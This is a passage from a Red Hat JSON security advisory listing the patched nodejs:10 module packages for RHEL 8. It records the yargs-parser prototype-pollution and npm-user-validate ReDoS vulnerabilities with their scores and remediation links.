"category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le" }, "product_reference": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x" }, "product_reference": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64" }, "product_reference": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch" }, "product_reference": "nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64" }, "product_reference": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le" }, "product_reference": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x" }, "product_reference": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64" }, "product_reference": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch" }, "product_reference": "nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src" }, "product_reference": "nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch" }, "product_reference": "nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src" }, "product_reference": "nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64" }, "product_reference": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le" }, "product_reference": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x" }, "product_reference": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" }, "product_reference": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-7608", "cwe": { "id": "CWE-267", "name": "Privilege Defined With Unsafe Actions" }, "discovery_date": "2020-05-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1840004" } ], "notes": [ { "category": "description", "text": "A vulnerability was found in nodesjs-yargs-parser, where it can be tricked into adding or modifying properties of the Object.prototype using a \"__proto__\" payload. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-yargs-parser: prototype pollution vulnerability", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7608" }, { "category": "external", "summary": "RHBZ#1840004", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1840004" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7608", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7608" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7608", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7608" } ], "release_date": "2020-03-16T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:46+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0548" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-yargs-parser: prototype pollution vulnerability" }, { "cve": "CVE-2020-7754", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-10-18T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1892430" } ], "notes": [ { "category": "description", "text": "This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Hat Enterprise Linux 8 and Software Collections, `npm-user-validate` is used exclusively for `npm`. As a result, this vulnerability is considered Low in such a context.\n\nIn OpenShift Container Platform (OCP) 3.11 and 4.4 the kibana package has been marked Low (similar to RHEL8) as it is primarily used for npm and is protected via OpenShift OAuth. Additionally, whilst OCP 4.4 does deliver the kibana package, due to the code changing to container first content, it has been marked as wontfix at this time and may be fixed in a future release. \n\nAdditionally, the openshift4/ose-logging-kibana6 container is not represented on the CVE page as it gets npm from the Red Hat Software Collections and as such the ose-logging-kibana6 container will be updated when the rh-nodejs10-nodejs package is.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", 